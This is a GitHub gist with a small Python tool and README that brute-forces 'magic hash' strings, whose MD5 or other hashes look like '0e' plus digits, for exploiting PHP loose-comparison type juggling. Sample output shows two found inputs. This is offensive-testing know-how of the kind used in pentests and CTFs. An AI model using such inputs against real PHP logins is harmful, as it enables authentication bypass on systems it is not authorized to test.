Skip to content

Instantly share code, notes, and snippets.

@dhondta
Last active July 31, 2023 22:14
Show Gist options
  • Save dhondta/8937374f087f708c608bcacac431969f to your computer and use it in GitHub Desktop.
Save dhondta/8937374f087f708c608bcacac431969f to your computer and use it in GitHub Desktop.
Tinyscript tool for generating loose comparison hashes for PHP type juggling

PHP loose comparison input generator

This Tinyscript-based allows to generate a string with a given alphabet that has a given hash matching the format used for type juggling with PHP, that is when a loose comparison of the type ("0e12345" == ...) is used.

This can be installed using:

$ pip install tinyscript
$ tsm install loose-comparison-input-generator

This tool is especially useful in the use cases hereafter.

Generate hashes for exploiting a PHP type juggling vulnerability

$ python3 loose-comparison-input-generator.py --timings -a 0123456789abcdefABCDEF
22:08:25 [WARNING] 0e283693623042943587666692738042: 1Cbca4D
22:08:25 [TIME] > Time elapsed since execution start: 976.6611046791077 seconds
22:22:14 [WARNING] 0e743365132016763607448823802679: 462beA7
22:22:14 [TIME] > Time elapsed since execution start: 1805.5506649017334 seconds
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
from tinyscript import *
__author__ = "Alexandre D'Hondt"
__version__ = "1.1"
__copyright__ = "A. D'Hondt"
__license__ = "agpl-3.0"
__doc__ = """
This tool simply generates a string with a given alphabet that has a given hash
matching the format used for type juggling with PHP, that is when a loose
comparison of the type ("0e12345" == ...) is used.
"""
__examples__ = ["-v", "-a 0123456789abcdefABCDEF", "--hash sha1", "--timings"]
if __name__ == '__main__':
parser.add_argument("-a", dest="alphabet", default=string.digits+string.ascii_letters, help="alphabet to be used")
parser.add_argument("--hash", default="md5", help="hash algorithm to be used")
initialize(add_time=True)
validate(('hash', "not hasattr(hashlib, ? )", "Bad hash algorithm"))
for s in ts.bruteforce(2**32, args.alphabet):
h = getattr(hashlib, args.hash)(b(s)).hexdigest()
logger.debug("{}: {}".format(h, s))
if re.match(r"^0+e\d+$", h):
logger.warn("{}: {}".format(h, s))
get_time()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment